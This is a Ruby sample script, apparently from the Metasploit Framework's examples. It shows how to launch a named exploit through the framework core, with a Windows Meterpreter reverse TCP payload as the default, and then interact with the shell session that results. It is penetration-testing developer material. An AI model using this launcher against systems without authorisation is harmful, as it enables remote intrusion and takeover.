#!/usr/bin/env ruby
#
# This sample demonstrates using the framework core directly to launch an
# exploit.  It uses the framework base Framework class so that the
# distribution module path is automatically set, but relies strictly on
# framework core classes for everything else.
#

$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))

require 'msf/base'

if (ARGV.length == 0)
	puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
	exit
end

framework    = Msf::Simple::Framework.create
exploit_name = ARGV.shift || 'test/multi/aggressive'
payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
input        = Rex::Ui::Text::Input::Stdio.new
output       = Rex::Ui::Text::Output::Stdio.new

begin
	# Create the exploit driver instance.
	driver = Msf::ExploitDriver.new(framework)

	# Initialize the exploit driver's exploit and payload instance
	driver.exploit = framework.exploits.create(exploit_name)
	driver.payload = framework.payloads.create(payload_name)

	# Import options specified in VAR=VAL format from the supplied command
	# line.
	driver.exploit.datastore.import_options_from_s(ARGV.join(' '))

	# Share the exploit's datastore with the payload.
	driver.payload.share_datastore(driver.exploit.datastore)

	# Initialize the target index to what's in the exploit's data store or 
	# zero by default.
	driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i

	# Initialize the exploit and payload user interfaces.
	driver.exploit.init_ui(input, output)
	driver.payload.init_ui(input, output)

	# Fire it off.
	session = driver.run

	# If a session came back, try to interact with it.
	if (session)
		output.print_status("Session #{session.sid} created, interacting...")
		output.print_line

		session.init_ui(input, output)

		session.interact
	else
		output.print_line("Exploit completed, no session was created.")
	end

rescue
	output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
end
